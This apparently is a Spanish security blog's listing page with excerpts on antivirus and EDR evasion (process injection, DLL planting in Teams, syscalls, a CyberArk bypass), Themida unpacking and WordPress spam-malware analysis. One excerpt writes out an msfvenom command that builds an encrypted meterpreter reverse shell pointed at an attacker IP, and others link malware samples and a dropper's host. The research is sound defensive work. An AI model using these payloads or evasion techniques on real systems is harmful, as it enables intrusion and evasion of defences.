Entradas

Evasión de antivirus modernos usando Process Injection - MITRE T1055

Imagen
  En octubre de este año revisé algunas técnicas comunes de inyección de shellcode en otros procesos, también conocido como Process Injection y puse a prueba algunos antivirus, me hubiese gustado probar más, pero por tiempo no pude. Me sorprendió que siendo técnicas conocidas y sin ofuscación alguna lograra evadir varios antivirus.  Si bien esto lo hago con el propósito de aprender y poner a prueba algunas marcas (a todas les reporté esto), deja en evidencia lo que siempre decimos, que no debemos descansar en "cajas" ni en productos de seguridad si no que deben ser parte de una cadena de mecanismos de protección (protección por capas, partiendo por la capa 8). Incluye el código fuente por si quieres poner a prueba tu antivirus.

DLL Planting en Microsoft Teams para evasión de antivirus y persistencia

Imagen
Comparto parte de una investigación, donde descubrí que podemos usar Microsoft Teams como herramienta para evadir Antivirus, EDRs y generar persistencia  

CVE-2020-25738 - Bypass Credential Theft Protection en Cyberark EPM

Imagen
 Hola! Comparto por acá un CVE que acabo de reportar, relacionado con la evasión de una de las características de protección de Cyberark EPM

Bypass Microsoft Windows Defender usando Syscall

Imagen
  En mayo de este año, en una de mis investigaciones logré evadir los mecanismos de detección de Microsoft Windows Defender, con el objetivo de conocer y poner en práctica algunas técnicas utilizadas por atacantes en sus piezas de malware. Cuando se utilizan códigos propios, al no ser conocidas sus firmas y comportamientos, es más fácil lograr evadir las soluciones de seguridad, así que decidí utilizar algo conocido, que fuera detectado por la mayoría de antivirus, para así poder evidenciar realmente una evasión o bypass de la solución. Utilicé una shell reversa de meterpreter, generada por la herramienta msfvenom. [email protected] : /bypass/windefender # msfvenom --encrypt rc4 --encrypt-key S3cr3t -p windows/x64/meterpreter/reverse_tcp LHOST=[IP-Atacante] LPORT=443 -f csharp La prueba se realizó en un Windows 10 Professional x64 (1909) usando como lenguaje de programación C#, para aprovechar el compilador que viene incluido en el sistema operativo "csc.exe". En el comando m

Desempaquetando Themida 2 (unpacking windows binary) - Análisis de Malware

Imagen
Comparto el mecanismo que me ha funcionado para desempacar los binarios protegidos con Themida 2. Para quienes no conocen Themida, se trata de un software comercial, cuyo objetivo es proteger los binarios de la ingeniería inversa, pensando en proteger a los fabricantes de software de la copia de sus códigos, impedir la generación de cracks o keygens para sus licencias, entre otros. Pero obviamente, esto también es aprovechado por los atacantes que escriben malware, ya que este mecanismo hace mucho más difícil el análisis de los investigadores. En el ejemplo que explico ahora, revisaré un troyano que comparto acá: https://github.com/inc0d3/malware/blob/master/windows/Trusteer.zip Para el análisis recomiendo usar Windows 7 32 bits con las herramientas de Flare: https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html Ejecuté el malware e inmediatamente surgió este error: Es porque tenía corriendo las utilidades Process Monitor y Proce

SPAM en sitios web, generalmente que utilizan Wordpress - Parte II - Análisis de Malware

Imagen
Esta es la segunda parte del post donde analizo distintos malwares instalados en un sitio web, donde la mayoría tienen el mismo objetivo: enviar SPAM. Puedes revisar la primera parte acá. La muestra que reviso a continuación está escrita en Perl, debido a que el código es extenso dejo el link con la muestra original acá: https://github.com/inc0d3/malware/blob/master/spam/perl/dropper-envio-spam.pl Se utilizó  http://perlobfuscator.com/  o algo similar para ofuscar su código,  pero para hacerlo más legible, basta con cambiar la función "eval" por "print" y tendremos la siguiente salida: https://github.com/inc0d3/malware/blob/master/spam/perl/dropper-envio-spam-desofuscado.pl Este script lo que hace principalmente es la función de un dropper, descarga otro script en Perl; para ello consulta a la IP [217.172.180.24] con peticiones HTTP y esta responde con un link: https://xbclothes.com/wp-content/uploads/2018/06/attol.png Si analizamos la imagen PNG v

SPAM en sitios web, generalmente que utilizan Wordpress - Análisis de Malware

Imagen
Hace poco tuve que revisar el sitio web de un cliente, el trabajo era eliminar malware que estaba enviando mucho correo SPAM y también promocionando productos que claramente no era de su negocio o rubro. Lo primero que vi cuando entré al servidor fue una larga lista de archivos HTML con nombres aleatorios, todos ellos promocionando productos extranjeros. Seguí revisando y encontré scripts en PHP, Javascript y Perl, es decir, estaba más que infectado. Pero no quiero hablar sobre el trabajo de limpieza que tuve que hacer, sino del análisis de los distintos malwares instalados (que es una investigación personal, no estaba en el alcance del trabajo). JS REDIRECT Estas son dos muestras de la larga lista de archivos HTML, todos similares: Muestra HTML 1 <html> <head> <title>thousands32761 Gaudiest - whatsoeer alert seemliness champion affright. Listend sense.</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-88